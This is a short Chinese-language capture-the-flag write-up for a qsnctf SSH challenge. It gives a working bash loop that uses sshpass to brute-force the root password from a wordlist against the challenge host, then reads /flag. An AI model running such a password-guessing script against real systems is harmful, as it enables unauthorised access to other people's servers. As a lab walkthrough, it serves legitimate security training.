SSH的密码qsnctfwp
- 开启 kali,在终端输入
ssh root@challenge.qsnctf.com -p [port]
可以访问远程 SSH 系统 - 根据提供的 passlist.txt 文件内容进行密码爆破
- 编写 Shell 脚本
#!/bin/bash while IFS= read -r PASSWORD do sshpass -p "$PASSWORD" ssh -t -t "root@challenge.qsnctf.com" -p 10538 if [ $? -eq 0 ]; then echo "登录成功!密码为: $PASSWORD" exit 0 fi done < "passlist.txt" echo "登录失败!"
- 设置脚本权限,使用命令
chmod 777 [shellname].sh
- 获得密码后进入 Alpine 系统
- 根据提示 flag 在根目录,使用命令
cat /flag
即可获取flag
-End-